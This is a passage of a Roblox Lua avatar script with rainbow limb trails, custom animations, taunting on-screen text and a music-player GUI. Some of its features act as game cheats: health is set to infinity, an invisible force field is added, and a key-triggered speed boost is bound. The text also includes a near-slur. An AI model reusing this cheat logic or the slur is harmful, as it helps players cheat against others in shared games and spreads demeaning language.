"Symmetric" v.Anchored = true v.CanCollide = false v.BottomSurface = "Smooth" v.TopSurface = "Smooth" v.Size = Vector3.new(10, 5, 3) v.Transparency = 1 v.CFrame = char.Torso.CFrame v.BrickColor = BrickColor.new("Really black") v.Transparency = 1 spawn(function() TweenService = game:GetService("TweenService") Colours = {Color3.fromRGB(0,100,200),Color3.fromRGB(4, 175, 236)} Int = 0 while wait(2) do if Int == #Colours then Int = 0 end Int = Int+1 TweenService:Create(text,TweenInfo.new(1),{TextColor3 = Colours[Int]}):Play() end end) v.Shape = "Block" text.Text = "~»Chill Af«~" Player = game:GetService("Players").LocalPlayer Character = Player.Character PlayerGui = Player.PlayerGui Backpack = Player.Backpack Torso = Character.Torso Head = Character.Head Humanoid = Character.Humanoid m = Instance.new("Model", Character) LeftArm = Character["Left Arm"] LeftLeg = Character["Left Leg"] RightArm = Character["Right Arm"] RightLeg = Character["Right Leg"] LS = Torso["Left Shoulder"] LH = Torso["Left Hip"] RS = Torso["Right Shoulder"] RH = Torso["Right Hip"] Face = Head.face Neck = Torso.Neck it = Instance.new attacktype = 1 vt = Vector3.new cf = CFrame.new bc = BrickColor.new br = BrickColor.random it = Instance.new euler = CFrame.fromEulerAnglesXYZ angles = CFrame.Angles cloaked = false necko = cf(0, 1, 0, -1, 0, 0, 0, 0, 1, 0, 1, 0) necko2 = cf(0, -0.5, 0, -1, 0, 0, 0, 0, 1, 0, 1, 0) LHC0 = cf(-1, -1, 0, 0, 0, -1, 0, 1, 0, 1, 0, 0) LHC1 = cf(-0.5, 1, 0, 0, 0, -1, 0, 1, 0, 1, 0, 0) RHC0 = cf(1, -1, 0, 0, 0, 1, 0, 1, 0, -1, 0, 0) RHC1 = cf(0.5, 1, 0, 0, 0, 1, 0, 1, 0, -1, 0, 0) RootPart = Character.HumanoidRootPart RootJoint = RootPart.RootJoint RootCF = euler(-1.57, 0, 3.14) attack = false attackdebounce = false equipped = false trispeed = 0.2 attackmode = "none" local idle = 0 local Anim = "Idle" Head.face.Texture = "rbxassetid://206844132" local Trail = Instance.new("Trail",char) local attachment0 = Instance.new("Attachment",char["Right Arm"]) attachment0.Name = "TrailAttachment0" attachment0.CFrame = CFrame.new(-0.25,-1,0) local attachment1 = Instance.new("Attachment",char["Right Arm"]) attachment1.CFrame = CFrame.new(0.25,-1,0) attachment1.Name = "TrailAttachment1" Trail.Transparency = NumberSequence.new({NumberSequenceKeypoint.new(0,0),NumberSequenceKeypoint.new(1,1)}) Trail.Color = ColorSequence.new({ColorSequenceKeypoint.new(0,Color3.new(1,0,0)),ColorSequenceKeypoint.new(0.2,Color3.new(1,1,0)),ColorSequenceKeypoint.new(0.4,Color3.new(0,1,0)),ColorSequenceKeypoint.new(0.6,Color3.new(0,1,1)),ColorSequenceKeypoint.new(0.8,Color3.new(0,0,1)),ColorSequenceKeypoint.new(1,Color3.new(0,0,1))}) Trail.Lifetime = 0.5 Trail.Attachment0 = attachment0 Trail.Attachment1 = attachment1 local Trail = Instance.new("Trail",char) local attachment0 = Instance.new("Attachment",char["Left Arm"]) attachment0.Name = "TrailAttachment0" attachment0.CFrame = CFrame.new(-0.25,-1,0) local attachment1 = Instance.new("Attachment",char["Left Arm"]) attachment1.CFrame = CFrame.new(0.25,-1,0) attachment1.Name = "TrailAttachment1" Trail.Transparency = NumberSequence.new({NumberSequenceKeypoint.new(0,0),NumberSequenceKeypoint.new(1,1)}) Trail.Color = ColorSequence.new({ColorSequenceKeypoint.new(0,Color3.new(1,0,0)),ColorSequenceKeypoint.new(0.2,Color3.new(1,1,0)),ColorSequenceKeypoint.new(0.4,Color3.new(0,1,0)),ColorSequenceKeypoint.new(0.6,Color3.new(0,1,1)),ColorSequenceKeypoint.new(0.8,Color3.new(0,0,1)),ColorSequenceKeypoint.new(1,Color3.new(0,0,1))}) Trail.Lifetime = 0.5 Trail.Attachment0 = attachment0 Trail.Attachment1 = attachment1 local Trail = Instance.new("Trail",char) local attachment0 = Instance.new("Attachment",char["Right Leg"]) attachment0.Name = "TrailAttachment0" attachment0.CFrame = CFrame.new(-0.25,-1,0) local attachment1 = Instance.new("Attachment",char["Right Leg"]) attachment1.CFrame = CFrame.new(0.25,-1,0) attachment1.Name = "TrailAttachment1" Trail.Transparency = NumberSequence.new({NumberSequenceKeypoint.new(0,0),NumberSequenceKeypoint.new(1,1)}) Trail.Color = ColorSequence.new({ColorSequenceKeypoint.new(0,Color3.new(1,0,0)),ColorSequenceKeypoint.new(0.2,Color3.new(1,1,0)),ColorSequenceKeypoint.new(0.4,Color3.new(0,1,0)),ColorSequenceKeypoint.new(0.6,Color3.new(0,1,1)),ColorSequenceKeypoint.new(0.8,Color3.new(0,0,1)),ColorSequenceKeypoint.new(1,Color3.new(0,0,1))}) Trail.Lifetime = 0.5 Trail.Attachment0 = attachment0 Trail.Attachment1 = attachment1 local Trail = Instance.new("Trail",char) local attachment0 = Instance.new("Attachment",char["Left Leg"]) attachment0.Name = "TrailAttachment0" attachment0.CFrame = CFrame.new(-0.25,-1,0) local attachment1 = Instance.new("Attachment",char["Left Leg"]) attachment1.CFrame = CFrame.new(0.25,-1,0) attachment1.Name = "TrailAttachment1" Trail.Transparency = NumberSequence.new({NumberSequenceKeypoint.new(0,0),NumberSequenceKeypoint.new(1,1)}) Trail.Color = ColorSequence.new({ColorSequenceKeypoint.new(0,Color3.new(1,0,0)),ColorSequenceKeypoint.new(0.2,Color3.new(1,1,0)),ColorSequenceKeypoint.new(0.4,Color3.new(0,1,0)),ColorSequenceKeypoint.new(0.6,Color3.new(0,1,1)),ColorSequenceKeypoint.new(0.8,Color3.new(0,0,1)),ColorSequenceKeypoint.new(1,Color3.new(0,0,1))}) Trail.Lifetime = 0.5 Trail.Attachment0 = attachment0 Trail.Attachment1 = attachment1 Humanoid.Animator.Parent = nil Character.Animate.Parent = nil function FindNearestTorso(Position, Distance, SinglePlayer) if SinglePlayer then return Distance > (SinglePlayer.Torso.CFrame.p - Position).magnitude end local List = {} for i, v in pairs(workspace:GetChildren()) do if v:IsA("Model") and v:findFirstChild("Torso") and v ~= Character and Distance >= (v.Torso.Position - Position).magnitude then table.insert(List, v) end end return List end function lerp(a, b, t) return a + (b - a) * t end function slerp(a, b, t) dot = a:Dot(b) if dot > 0.99999 or dot < -0.99999 then return t <= 0.5 and a or b else r = math.acos(dot) return (a * math.sin((1 - t) * r) + b * math.sin(t * r)) / math.sin(r) end end function matrixInterpolate(a, b, t) local ax, ay, az, a00, a01, a02, a10, a11, a12, a20, a21, a22 = a:components() local bx, by, bz, b00, b01, b02, b10, b11, b12, b20, b21, b22 = b:components() local v0 = lerp(Vector3.new(ax, ay, az), Vector3.new(bx, by, bz), t) local v1 = slerp(Vector3.new(a00, a01, a02), Vector3.new(b00, b01, b02), t) local v2 = slerp(Vector3.new(a10, a11, a12), Vector3.new(b10, b11, b12), t) local v3 = slerp(Vector3.new(a20, a21, a22), Vector3.new(b20, b21, b22), t) local t = v1:Dot(v2) if not (t < 0) and t ~= 0 and not (t > 0) then return CFrame.new() end return CFrame.new(v0.x, v0.y, v0.z, v1.x, v1.y, v1.z, v2.x, v2.y, v2.z, v3.x, v3.y, v3.z) end function genWeld(a, b) local w = Instance.new("Weld", a) w.Part0 = a w.Part1 = b return w end function weld(a, b) local weld = Instance.new("Weld") weld.Name = "W" weld.Part0 = a weld.Part1 = b weld.C0 = a.CFrame:inverse() * b.CFrame weld.Parent = a return weld end function Lerp(c1, c2, al) local com1 = { c1.X, c1.Y, c1.Z, c1:toEulerAnglesXYZ() } local com2 = { c2.X, c2.Y, c2.Z, c2:toEulerAnglesXYZ() } for i, v in pairs(com1) do com1[i] = v + (com2[i] - v) * al end return CFrame.new(com1[1], com1[2], com1[3]) * CFrame.Angles(select(4, unpack(com1))) end function clerp(a, b, t) local qa = { QuaternionFromCFrame(a) } local qb = { QuaternionFromCFrame(b) } local ax, ay, az = a.x, a.y, a.z local bx, by, bz = b.x, b.y, b.z local _t = 1 - t return QuaternionToCFrame(_t * ax + t * bx, _t * ay + t * by, _t * az + t * bz, QuaternionSlerp(qa, qb, t)) end function QuaternionFromCFrame(cf) local mx, my, mz, m00, m01, m02, m10, m11, m12, m20, m21, m22 = cf:components() local trace = m00 + m11 + m22 if trace > 0 then local s = math.sqrt(1 + trace) local recip = 0.5 / s return (m21 - m12) * recip, (m02 - m20) * recip, (m10 - m01) * recip, s * 0.5 else local i = 0 if m00 < m11 then i = 1 end if m22 > (i == 0 and m00 or m11) then i = 2 end if i == 0 then local s = math.sqrt(m00 - m11 - m22 + 1) local recip = 0.5 / s return 0.5 * s, (m10 + m01) * recip, (m20 + m02) * recip, (m21 - m12) * recip elseif i == 1 then local s = math.sqrt(m11 - m22 - m00 + 1) local recip = 0.5 / s return (m01 + m10) * recip, 0.5 * s, (m21 + m12) * recip, (m02 - m20) * recip elseif i == 2 then local s = math.sqrt(m22 - m00 - m11 + 1) local recip = 0.5 / s return (m02 + m20) * recip, (m12 + m21) * recip, 0.5 * s, (m10 - m01) * recip end end end function QuaternionToCFrame(px, py, pz, x, y, z, w) local xs, ys, zs = x + x, y + y, z + z local wx, wy, wz = w * xs, w * ys, w * zs local xx = x * xs local xy = x * ys local xz = x * zs local yy = y * ys local yz = y * zs local zz = z * zs return CFrame.new(px, py, pz, 1 - (yy + zz), xy - wz, xz + wy, xy + wz, 1 - (xx + zz), yz - wx, xz - wy, yz + wx, 1 - (xx + yy)) end function QuaternionSlerp(a, b, t) local cosTheta = a[1] * b[1] + a[2] * b[2] + a[3] * b[3] + a[4] * b[4] local startInterp, finishInterp if cosTheta >= 1.0E-4 then if 1 - cosTheta > 1.0E-4 then local theta = math.acos(cosTheta) local invSinTheta = 1 / math.sin(theta) startInterp = math.sin((1 - t) * theta) * invSinTheta finishInterp = math.sin(t * theta) * invSinTheta else startInterp = 1 - t finishInterp = t end elseif 1 + cosTheta > 1.0E-4 then local theta = math.acos(-cosTheta) local invSinTheta = 1 / math.sin(theta) startInterp = math.sin((t - 1) * theta) * invSinTheta finishInterp = math.sin(t * theta) * invSinTheta else startInterp = t - 1 finishInterp = t end return a[1] * startInterp + b[1] * finishInterp, a[2] * startInterp + b[2] * finishInterp, a[3] * startInterp + b[3] * finishInterp, a[4] * startInterp + b[4] * finishInterp end function rayCast(Pos, Dir, Max, Ignore) return game:service("Workspace"):FindPartOnRay(Ray.new(Pos, Dir.unit * (Max or 999.999)), Ignore) end function part(formfactor, parent, reflectance, transparency, brickcolor, name, size) local fp = it("Part") fp.formFactor = formfactor fp.Parent = parent fp.Reflectance = reflectance fp.Transparency = transparency fp.CanCollide = false fp.Locked = true fp.BrickColor = brickcolor fp.Name = name fp.Size = size fp.Position = Torso.Position fp.BottomSurface = "Smooth" fp.TopSurface = "Smooth" fp:BreakJoints() return fp end function mesh(Mesh, part, meshtype, meshid, offset, scale) local mesh = it(Mesh) mesh.Parent = part if Mesh == "SpecialMesh" then mesh.MeshType = meshtype mesh.MeshId = meshid end mesh.Offset = offset mesh.Scale = scale return mesh end function weld(parent, part0, part1, c0) local weld = it("Weld") weld.Parent = parent weld.Part0 = part0 weld.Part1 = part1 weld.C0 = c0 return weld end function rayCast(Pos, Dir, Max, Ignore) return game:service("Workspace"):FindPartOnRay(Ray.new(Pos, Dir.unit * (Max or 999.999)), Ignore) end RSH, LSH = nil, nil RW, LW = Instance.new("Weld"), Instance.new("Weld") RW.Name = "Right Shoulder" LW.Name = "Left Shoulder" LH = Torso["Left Hip"] RH = Torso["Right Hip"] TorsoColor = Torso.BrickColor function NoOutline(Part) Part.TopSurface, Part.BottomSurface, Part.LeftSurface, Part.RightSurface, Part.FrontSurface, Part.BackSurface = 10, 10, 10, 10, 10, 10 end player = Player ch = Character RSH = ch.Torso["Right Shoulder"] LSH = ch.Torso["Left Shoulder"] RSH.Parent = nil LSH.Parent = nil RW.Name = "Right Shoulder" RW.Part0 = ch.Torso RW.C0 = cf(1.5, 0.5, 0) RW.C1 = cf(0, 0.5, 0) RW.Part1 = ch["Right Arm"] RW.Parent = ch.Torso LW.Name = "Left Shoulder" LW.Part0 = ch.Torso LW.C0 = cf(-1.5, 0.5, 0) LW.C1 = cf(0, 0.5, 0) LW.Part1 = ch["Left Arm"] LW.Parent = ch.Torso function newWeld(wp0, wp1, wc0x, wc0y, wc0z) local wld = Instance.new("Weld", wp1) wld.Part0 = wp0 wld.Part1 = wp1 wld.C0 = CFrame.new(wc0x, wc0y, wc0z) end newWeld(RootPart, Torso, 0, -1, 0) Torso.Weld.C1 = CFrame.new(0, -1, 0) newWeld(Torso, LeftLeg, -0.5, -1, 0) LeftLeg.Weld.C1 = CFrame.new(0, 1, 0) newWeld(Torso, RightLeg, 0.5, -1, 0) RightLeg.Weld.C1 = CFrame.new(0, 1, 0) Player = game:GetService("Players").LocalPlayer Character = Player.Character mouse = Player:GetMouse() m = Instance.new("Model", Character) local weldBetween = function(a, b) local weldd = Instance.new("ManualWeld") weldd.Part0 = a weldd.Part1 = b weldd.C0 = CFrame.new() weldd.C1 = b.CFrame:inverse() * a.CFrame weldd.Parent = a return weldd end ArtificialHB = Instance.new("BindableEvent", script) ArtificialHB.Name = "Heartbeat" script:WaitForChild("Heartbeat") frame = 0.016666666666666666 tf = 0 allowframeloss = false tossremainder = false lastframe = tick() script.Heartbeat:Fire() game:GetService("RunService").Heartbeat:connect(function(s, p) tf = tf + s if tf >= frame then if allowframeloss then script.Heartbeat:Fire() lastframe = tick() else for i = 1, math.floor(tf / frame) do script.Heartbeat:Fire() end lastframe = tick() end if tossremainder then tf = 0 else tf = tf - frame * math.floor(tf / frame) end end end) function swait(num) if num == 0 or num == nil then ArtificialHB.Event:wait() else for i = 0, num do ArtificialHB.Event:wait() end end end mouse.KeyDown:connect(function(key) if key == "c" then repeat swait() Chillmusic.Volume = Chillmusic.Volume - 0.05 until Chillmusic.Volume == 0 Chillmusic:Stop() swait() Chillmusic2:Play() Chillmusic.Volume = 1 end end) mouse.KeyDown:connect(function(key) if key == "f" then text.Text = "Guys why not just chill?" wait(1) text.Text = "It's just the way life should be." wait(1) text.Text = "Chill is life." wait(1) text.Text = "Chill is love." wait(1) text.Text = "Chill is for the best." wait(1) text.Text = "Maybe if you were chill you wouldn't be a skid..." wait(3) text.Text = "But some people cant handle the chill can they." wait(3) text.Text = "Chill Af" end end) mouse.KeyDown:connect(function(key) if key == "v" then repeat swait() Chillmusic2.Volume = Chillmusic2.Volume - 0.05 until Chillmusic2.Volume == 0 Chillmusic2:Stop() swait() Chillmusic:Play() Chillmusic2.Volume = 1 end end) mouse.KeyDown:connect(function(key) if key == "b" then text.Text = "Be back scrubs." wait(1) text.Text = "Afk nibba..." end end) mouse.KeyDown:connect(function(key) if key == "n" then text.Text = "K back you nubs's!" wait(1) text.Text = "Chill Af" end end) m = Instance.new("ForceField", Character) m.Visible = false Character.Humanoid.WalkSpeed = 4 mouse.KeyDown:connect(function(key) if string.byte(key) == 48 then Swing = 2 Character.Humanoid.WalkSpeed = 40 end end) mouse.KeyUp:connect(function(key) if string.byte(key) == 48 then Swing = 1 Character.Humanoid.WalkSpeed = 4 end end) local sine = 0 local change = 1 local val = 0 spawn(function() while true do swait() sine = sine + change local torvel = (RootPart.Velocity * Vector3.new(1, 0, 1)).magnitude local velderp = RootPart.Velocity.y hitfloor, posfloor = rayCast(RootPart.Position, CFrame.new(RootPart.Position, RootPart.Position - Vector3.new(0, 1, 0)).lookVector, 4, Character) if equipped == true or equipped == false then if attack == false then idle = idle + 1 Character.Humanoid.MaxHealth = math.huge Character.Humanoid.Health = math.huge else idle = 0 end if not (idle >= 500) or attack == false then end if torvel < 1 and hitfloor ~= nil then Anim = "Chill" if attack == false then Humanoid.CameraOffset = Vector3.new(0, 10.25 - 5.45 * math.cos(sine / 65), 0) Torso.Weld.C0 = clerp(Torso.Weld.C0, CFrame.new(0, 10.25 - 5.45 * math.cos(sine / 65), 0) * CFrame.Angles(math.rad(90 + 15 * math.sin(sine / 60)), math.rad(0), math.rad(0)), 0.8) Torso.Neck.C0 = clerp(Torso.Neck.C0, necko * angles(math.rad(-20 + 20 * math.cos(sine / 60)), math.rad(0 + 4 * math.sin(sine / 60)), math.rad(0)), 0.2) RW.C0 = clerp(RW.C0, CFrame.new(1.5, 0.5, 0) * angles(math.rad(-90 + 25 * math.cos(sine / 60)), math.rad(0 + 20 * math.sin(sine / 60)), math.rad(0 + 55 * math.sin(sine / 60))), 0.3) LW.C0 = clerp(LW.C0, CFrame.new(-1.5, 0.5, 0) * angles(math.rad(-90 + 25 * math.cos(sine / 60)), math.rad(-20 - 20 * math.sin(sine / 60)), math.rad(0 - 55 * math.sin(sine / 60))), 0.3) LeftLeg.Weld.C0 = clerp(LeftLeg.Weld.C0, CFrame.new(-0.5, -0.86 + 0.03 * math.cos(sine / 65), -0.4) * CFrame.Angles(math.rad(15 - 45 * math.cos(sine / 70)), math.rad(3), math.rad(-4)), 0.8) RightLeg.Weld.C0 = clerp(RightLeg.Weld.C0, CFrame.new(0.5, -1 + 0.05 * math.cos(sine / 65), -0.4) * CFrame.Angles(math.rad(15 - 35 * math.cos(sine / 65)), math.rad(-3), math.rad(4)), 0.8) end elseif torvel > 2 and torvel < 22 and hitfloor ~= nil then Anim = "Walk" if attack == false then Humanoid.CameraOffset = Vector3.new(0, 6 - 2.55 * math.cos(sine / 48.5), 0) RootJoint.C0 = clerp(RootJoint.C0, RootCF * cf(0, 0, 0) * angles(math.rad(5), math.rad(0), math.rad(0)), 0.2) Torso.Weld.C0 = clerp(Torso.Weld.C0, CFrame.new(0, 6 - 2.55 * math.cos(sine / 48.5), 0) * CFrame.Angles(math.rad(-90 + 5 * math.cos(sine / 45)), math.rad(180 * math.cos(sine / 48.5)), math.rad(0)), 0.8) Torso.Neck.C0 = clerp(Torso.Neck.C0, necko * angles(math.rad(-4 + 2 * math.sin(sine / 48)), math.rad(0), math.rad(0)), 0.2) RW.C0 = clerp(RW.C0, cf(1.5, 0.5 + 0.1 * math.cos(sine / 45), 0) * angles(math.rad(90), math.rad(0), math.rad(90 - 20.5 * math.cos(sine / 45))), 0.3) LW.C0 = clerp(LW.C0, cf(-1.5, 0.5 + 0.1 * math.cos(sine / 45), 0) * angles(math.rad(90), math.rad(0), math.rad(-90 + 20.5 * math.cos(sine / 45))), 0.3) LeftLeg.Weld.C0 = clerp(LeftLeg.Weld.C0, CFrame.new(-0.5, -1 - 0.05 * math.cos(sine / 45), 0) * CFrame.Angles(math.rad(0), math.rad(3), math.rad(-4)), 0.8) RightLeg.Weld.C0 = clerp(RightLeg.Weld.C0, CFrame.new(0.5, -1 + 0.05 * math.cos(sine / 45), 0) * CFrame.Angles(math.rad(0), math.rad(-3), math.rad(4)), 0.8) end elseif torvel >= 22 and hitfloor ~= nil then Anim = "Run" if attack == false then Humanoid.CameraOffset = Vector3.new(0, 6 - 1.55 * math.cos(sine / 68.5), 0) RootJoint.C0 = clerp(RootJoint.C0, RootCF * cf(0, 6 - 1.55 * math.cos(sine / 68.5), -0.2) * angles(math.rad(50), math.rad(0), math.rad(0)), 0.2) Torso.Weld.C0 = clerp(Torso.Weld.C0, CFrame.new(0, 6 - 1.55 * math.cos(sine / 68.5), 0) * CFrame.Angles(math.rad(-40 + 20 * math.sin(sine / 68.5)), 0, 0), 0.8) Torso.Neck.C0 = clerp(Torso.Neck.C0, necko * angles(math.rad(-12 + 17 * math.cos(sine / 68.5)), math.rad(0), math.rad(0)), 0.2) RW.C0 = clerp(RW.C0, CFrame.new(1.5, 0.5, 0) * angles(math.rad(-90), math.rad(0), math.rad(40 - 20 * math.cos(sine / 68.5))), 0.2) LW.C0 = clerp(LW.C0, CFrame.new(-1.5, 0.5, 0) * angles(math.rad(-90), math.rad(0), math.rad(-40 + 20 * math.cos(sine / 68.5))), 0.2) LeftLeg.Weld.C0 = clerp(LeftLeg.Weld.C0, CFrame.new(-0.5, -0.87, -0.25) * CFrame.Angles(math.rad(-45 - 10 * math.cos(sine / 68.5)), math.rad(0), math.rad(0)), 0.8) RightLeg.Weld.C0 = clerp(RightLeg.Weld.C0, CFrame.new(0.5, -1, -0.1) * CFrame.Angles(math.rad(-35 - 10 * math.cos(sine / 68.5)), math.rad(0), math.rad(0)), 0.8) end end end end end) -- Objects local Chill_Gui_Bro = Instance.new("ScreenGui", game.Players.LocalPlayer.PlayerGui) local Header = Instance.new("Frame") local BackGround = Instance.new("Frame") local Chill_Gui_Label = Instance.new("TextLabel") local Play_ID_Button = Instance.new("TextButton") local ID_Box = Instance.new("TextBox") local Set_Vol_Button = Instance.new("TextButton") local Vol_Box = Instance.new("TextBox") local Set_Tpos_Button = Instance.new("TextButton") local Tpos_Box = Instance.new("TextBox") local Set_Text_Button = Instance.new("TextButton") local Tpos_Box_2 = Instance.new("TextBox") local Toggle_Chat_Button = Instance.new("TextButton") local Chat_Toggle_Label = Instance.new("TextLabel") local Current_Song_Label = Instance.new("TextLabel") -- Properties Chill_Gui_Bro.Name = "Chill_Gui_Bro" Header.Name = "Header" Header.Parent = Chill_Gui_Bro Header.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647) Header.BorderSizePixel = 0 Header.Draggable = true Header.Active = true Header.Selectable = true Header.Position = UDim2.new(0.469539374, 0, 0.147921771, 0) Header.Size = UDim2.new(0, 250, 0, 45) BackGround.Name = "BackGround" BackGround.Parent = Header BackGround.BackgroundColor3 = Color3.new(0.196078, 0.196078, 0.196078) BackGround.BorderSizePixel = 0 BackGround.Draggable = true BackGround.Position = UDim2.new(0, 0, 1, 0) BackGround.Size = UDim2.new(0, 250, 0, 299) Chill_Gui_Label.Name = "Chill_Gui_Label" Chill_Gui_Label.Parent = Header Chill_Gui_Label.BackgroundColor3 = Color3.new(1, 1, 1) Chill_Gui_Label.BackgroundTransparency = 1 Chill_Gui_Label.BorderSizePixel = 0 Chill_Gui_Label.Draggable = true Chill_Gui_Label.Size = UDim2.new(0, 250, 0, 45) Chill_Gui_Label.Font = Enum.Font.Arcade Chill_Gui_Label.Text = "~»Chill Gui«~" Chill_Gui_Label.TextColor3 = Color3.new(1, 1, 1) Chill_Gui_Label.TextScaled = true Chill_Gui_Label.TextSize = 14 Chill_Gui_Label.TextWrapped = true Play_ID_Button.Name = "Play_ID_Button" Play_ID_Button.Parent = Header Play_ID_Button.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647) Play_ID_Button.BorderColor3 = Color3.new(0, 0, 0) Play_ID_Button.BorderSizePixel = 0 Play_ID_Button.Position = UDim2.new(0.0520000011, 0, 1.22222221, 0) Play_ID_Button.Size = UDim2.new(0, 68, 0, 35) Play_ID_Button.Font = Enum.Font.Arcade Play_ID_Button.Text = "Play ID" Play_ID_Button.TextColor3 = Color3.new(1, 1, 1) Play_ID_Button.TextSize = 20 Play_ID_Button.TextWrapped = true ID_Box.Name = "ID_Box" ID_Box.Parent = Header ID_Box.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647) ID_Box.BorderColor3 = Color3.new(0, 0, 0) ID_Box.BorderSizePixel = 0 ID_Box.Position = UDim2.new(0.356000006, 0, 1.22222221, 0) ID_Box.Size = UDim2.new(0, 140, 0, 35) ID_Box.Font = Enum.Font.Arcade ID_Box.Text = "ID here" ID_Box.TextColor3 = Color3.new(1, 1, 1) ID_Box.TextSize = 35 ID_Box.TextWrapped = true Set_Vol_Button.Name = "Set_Vol_Button" Set_Vol_Button.Parent = Header Set_Vol_Button.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647) Set_Vol_Button.BorderColor3 = Color3.new(0, 0, 0) Set_Vol_Button.BorderSizePixel = 0 Set_Vol_Button.Position = UDim2.new(0.0520000011, 0, 2.20000005, 0) Set_Vol_Button.Size = UDim2.new(0, 68, 0, 35) Set_Vol_Button.Font = Enum.Font.Arcade Set_Vol_Button.Text = "Set Vol" Set_Vol_Button.TextColor3 = Color3.new(1, 1, 1) Set_Vol_Button.TextSize = 20 Set_Vol_Button.TextWrapped = true Vol_Box.Name = "Vol_Box" Vol_Box.Parent = Header Vol_Box.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647) Vol_Box.BorderColor3 = Color3.new(0, 0, 0) Vol_Box.BorderSizePixel = 0 Vol_Box.Position = UDim2.new(0.356000006, 0, 2.20000005, 0) Vol_Box.Size = UDim2.new(0, 140, 0, 35) Vol_Box.Font = Enum.Font.Arcade Vol_Box.Text = "Volume" Vol_Box.TextColor3 = Color3.new(1, 1, 1) Vol_Box.TextSize = 35 Vol_Box.TextWrapped = true Set_Tpos_Button.Name = "Set_Tpos_Button" Set_Tpos_Button.Parent = Header Set_Tpos_Button.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647) Set_Tpos_Button.BorderColor3 = Color3.new(0, 0, 0) Set_Tpos_Button.BorderSizePixel = 0 Set_Tpos_Button.Position = UDim2.new(0.0520000011, 0, 3.24444437, 0) Set_Tpos_Button.Size = UDim2.new(0, 68, 0, 35) Set_Tpos_Button.Font = Enum.Font.Arcade Set_Tpos_Button.Text = "Set Tpos" Set_Tpos_Button.TextColor3 = Color3.new(1, 1, 1) Set_Tpos_Button.TextSize = 18 Set_Tpos_Button.TextWrapped = true Tpos_Box.Name = "Tpos_Box" Tpos_Box.Parent = Header Tpos_Box.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647) Tpos_Box.BorderColor3 = Color3.new(0, 0, 0) Tpos_Box.BorderSizePixel = 0 Tpos_Box.Position = UDim2.new(0.356000006, 0, 3.24444437, 0) Tpos_Box.Size = UDim2.new(0, 140, 0, 35) Tpos_Box.Font = Enum.Font.Arcade Tpos_Box.Text = "Time Position" Tpos_Box.TextColor3 = Color3.new(1, 1, 1) Tpos_Box.TextSize = 20 Tpos_Box.TextWrapped = true Set_Text_Button.Name = "Set_Text_Button" Set_Text_Button.Parent = Header Set_Text_Button.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647) Set_Text_Button.BorderColor3 = Color3.new(0, 0, 0) Set_Text_Button.BorderSizePixel = 0 Set_Text_Button.Position = UDim2.new(0.0600000024, 0, 4.22222233, 0) Set_Text_Button.Size = UDim2.new(0, 68, 0, 35) Set_Text_Button.Font = Enum.Font.Arcade Set_Text_Button.Text = "Set Text" Set_Text_Button.TextColor3 = Color3.new(1, 1, 1) Set_Text_Button.TextSize = 18 Set_Text_Button.TextWrapped = true Tpos_Box_2.Name = "Tpos_Box" Tpos_Box_2.Parent = Header Tpos_Box_2.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647) Tpos_Box_2.BorderColor3 = Color3.new(0, 0, 0) Tpos_Box_2.BorderSizePixel = 0 Tpos_Box_2.Position = UDim2.new(0.356000006, 0, 4.22222233, 0) Tpos_Box_2.Size = UDim2.new(0, 140, 0, 35) Tpos_Box_2.Font = Enum.Font.Arcade Tpos_Box_2.Text = "Text" Tpos_Box_2.TextColor3 = Color3.new(1, 1, 1) Tpos_Box_2.TextSize = 20 Tpos_Box_2.TextWrapped = true Toggle_Chat_Button.Name = "Toggle_Chat_Button" Toggle_Chat_Button.Parent = Header Toggle_Chat_Button.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647) Toggle_Chat_Button.BorderColor3 = Color3.new(0, 0, 0) Toggle_Chat_Button.BorderSizePixel = 0 Toggle_Chat_Button.Position = UDim2.new(0.0579999983, 0, 5.26666689, 0) Toggle_Chat_Button.Size = UDim2.new(0, 97, 0, 35) Toggle_Chat_Button.Font = Enum.Font.Arcade Toggle_Chat_Button.Text = "Toggle Chat" Toggle_Chat_Button.TextColor3 = Color3.new(1, 1, 1) Toggle_Chat_Button.TextSize = 20 Toggle_Chat_Button.TextWrapped = true Chat_Toggle_Label.Name = "Chat_Toggle_Label" Chat_Toggle_Label.Parent = Header Chat_Toggle_Label.BackgroundColor3 = Color3.new(1, 1, 1) Chat_Toggle_Label.BackgroundTransparency = 0.89999997615814 Chat_Toggle_Label.BorderColor3 = Color3.new(1, 1, 1) Chat_Toggle_Label.Position = UDim2.new(0.540000021, 0, 5.26666689, 0) Chat_Toggle_Label.Size = UDim2.new(0, 94, 0, 35) Chat_Toggle_Label.Font = Enum.Font.Arcade Chat_Toggle_Label.Text = "~»False«~" Chat_Toggle_Label.TextColor3 = Color3.new(1, 1, 1) Chat_Toggle_Label.TextScaled = true Chat_Toggle_Label.TextSize = 14 Chat_Toggle_Label.TextWrapped = true Current_Song_Label.Name = "Current_Song_Label" Current_Song_Label.Parent = Header Current_Song_Label.BackgroundColor3 = Color3.new(1, 1, 1) Current_Song_Label.BackgroundTransparency = 0.89999997615814 Current_Song_Label.BorderColor3 = Color3.new(1, 1, 1) Current_Song_Label.Position = UDim2.new(0.0520000011, 0, 6.64444447, 0) Current_Song_Label.Size = UDim2.new(0, 225, 0, 35) Current_Song_Label.Font = Enum.Font.Arcade Current_Song_Label.Text = "~»Current Song: None«~" Current_Song_Label.TextColor3 = Color3.new(1, 1, 1) Current_Song_Label.TextScaled = true Current_Song_Label.TextSize = 14 Current_Song_Label.TextWrapped = true Play_ID_Button.MouseButton1Down:Connect(function() if tonumber(ID_Box.Text) then Chillmusic:Stop() Chillmusic.SoundId='rbxassetid://'..tonumber(ID_Box.Text) Chillmusic:Play() currentsong = game:GetService("MarketplaceService"):GetProductInfo(tonumber(ID_Box.Text)).Name text.Text = "~»Chill Af«~ Now Playing: "..currentsong Current_Song_Label.Text = "~»Current Song: "..currentsong.."«~" wait(4) text.Text = "~»Fell Apart AF«~" end end) local ischatting = false Set_Vol_Button.MouseButton1Down:Connect(function() Chillmusic.Volume = tonumber(Vol_Box.Text) end) Set_Tpos_Button.MouseButton1Down:Connect(function() Chillmusic.TimePosition = tonumber(Tpos_Box.Text) 